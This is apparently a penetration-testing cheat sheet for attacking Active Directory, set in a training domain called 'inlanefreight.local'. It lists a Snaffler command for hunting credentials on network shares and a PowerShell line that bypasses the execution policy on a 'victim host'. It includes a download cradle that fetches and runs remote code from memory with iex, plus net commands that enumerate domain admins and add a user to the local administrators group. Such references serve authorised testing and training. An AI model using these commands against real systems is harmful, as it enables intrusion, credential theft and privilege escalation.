Help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data
Credentialed Enumeration With Built-In Tools
Basic Enumeration Commands
# Prints the PC's Name
# Prints out the OS version and revision level
# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn
PowerShell Enumeration Commands
# Lists available modules loaded for use.
# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List
# This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Set-ExecutionPolicy Bypass -Scope Process
# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value
# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
# Status Firewall
netsh advfirewall show allprofiles
# Status Windows Defender
Net Commands
# Information about password requirements
net accounts
# Password and lockout policy
net accounts /domain
# Information about domain groups
net group /domain
# List users with domain admin privileges
net group "Domain Admins" /domain
# List of PCs connected to the domain
net group "domain computers" /domain
# List PC accounts of domains controllers
net group "Domain Controllers" /domain
# User that belongs to the group
net group <domain_group_name> /domain
# List of domain groups
net groups /domain
# Lst users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup administrators /domain
# Add user to administrators
net localgroup administrators [username] /add
# Check current shares
net share
# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain
# List all users of the domain
net user /domain
# Get a list of computers
net view